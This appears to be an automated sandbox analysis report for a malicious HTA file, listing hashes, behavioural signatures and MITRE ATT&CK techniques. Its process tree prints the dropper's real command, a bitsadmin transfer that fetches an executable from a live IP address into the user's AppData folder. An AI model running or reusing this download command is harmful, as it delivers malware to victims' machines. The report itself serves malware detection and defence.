b0003fee15fabeeecfc69a4b88461d34f4b5e6998ea48621551b01029fdefde1

Analysis

max time kernel
46s
max time network
78s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
11-02-2023 01:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Agenzia_E2.hta
Size

7KB
MD5

3626ac1650be6760e78b74a020497af1
SHA1

81d935580f02ea3cb9f183cdf119a71f2ca8029c
SHA256

2a4524ca5890d27b697850d6dfdd9fc90bce87b471f95855ced8a7308fb8e5cb
SHA512

17ccd96971317f0db68d9b9264d4a74774fde0a892ed89f78a956b518ab940802aebe2d53da5b76bf93525ef37e4b4b76718c4f729620c592e3187f67e5cbff7
SSDEEP

96:SPL+gIPNEbJPl0EJjAr3BZE5S4dwatCu2WJ3f2Wgw9RKUzVj5q4NaM+12AVoolF1:ST3FF6r/TC0u2W37V5q0aM0wqr

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
268	bitsadmin.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1252 wrote to memory of 268	1252	mshta.exe	27
PID 1252 wrote to memory of 268	1252	mshta.exe	27
PID 1252 wrote to memory of 268	1252	mshta.exe	27
PID 1252 wrote to memory of 268	1252	mshta.exe	27

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Agenzia_E2.hta"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1252
- C:\Windows\SysWOW64\bitsadmin.exe
  "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://62.173.149.243/scarica.exe C:\Users\Admin\AppData\Roaming\setup.exe
  2⤵
  - Download via BitsAdmin
  PID:268

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

BITS Jobs

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/268-55-0x0000000000000000-mapping.dmp

Download
memory/1252-54-0x0000000074DE1000-0x0000000074DE3000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads